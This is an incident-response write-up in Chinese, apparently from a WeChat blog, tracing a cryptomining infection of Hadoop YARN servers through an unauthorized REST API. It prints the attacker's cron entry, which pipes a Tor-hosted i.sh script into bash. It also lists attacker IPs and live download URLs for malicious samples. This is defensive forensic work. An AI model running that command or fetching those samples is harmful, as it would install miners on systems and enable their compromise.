排查
某天多台机器cpu100%,疑似中了挖矿程序,在检测过程当中发现,外连了
tcp 0 0 xxx.xxx.xxx:56208 94.23.41.130:80 ESTABLISHED 48630/systemd --use
还有连接至37.59.43.131
但是查看进程却又发现/tmp/systemd该文件被删除了。
后来在yarn用户上发现被写入定时任务
33 * * * * wget -qO- -U- hxxps://ddgsdk6oou6znsdn.tor2web.io/i.sh|bash || wget -qO- -U- hxxps://ddgsdk6oou6znsdn.onion.guide/i.sh|bash
……
每小时的第33分钟会执行一次
还有在日志上发现有大量的操作记录
网上搜索有关yarn近期漏洞,发现攻击者疑似利用了“Hadoop Yarn REST API 未授权漏洞”进行入侵。
与腾讯云鼎实验室提供的攻击流程图很像
随后为避免在内网机器上再次触发,到自己机器上执行了下命令
发现该脚本会先把xmr、miner等kill掉,之后会检测/tmp/.X11-lock,建立文件
由于取消操作较快没有让他及时删除该文件,它还会判断一层你的内核版本是多少,之后下载对应内核版本的二进制文件。
文件存储/tmp/下,ls -la查看该隐藏文件
分析该二进制文件(后续结果丢失)
之后排查机器小于5kb的jar文件,发现Application.jar、SimpleApp.jar的文件
1、Application.jar
下述是SimpleApp.jar
解包查看
将base64解码后得到
初步判断它会对spark集群机器分发该SimpleApp.jar文件,去执行这条命令。
后续发现hxxp://176.119.28.11/b/z/ 目录存在大量被攻击机器ip
点击查看其中某台机器的信息
通过spark任务下载Application.jar,同时发现含有攻击者操作等脚本
发现执行y.sh会把它写入tmp.txt文件之后再利用curl post到re.php当中,随即删除该文件。
样本:
https://malwr3chij47327q.onion.plus/SimpleApp.jar
https://httpsxztdjm2vrpw.onion.plus/SimpleApp.jar
http://176.119.28.11/y.sh
本文始发于微信公众号(逢人斗智斗勇):一次针对挖矿攻击溯源概述
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论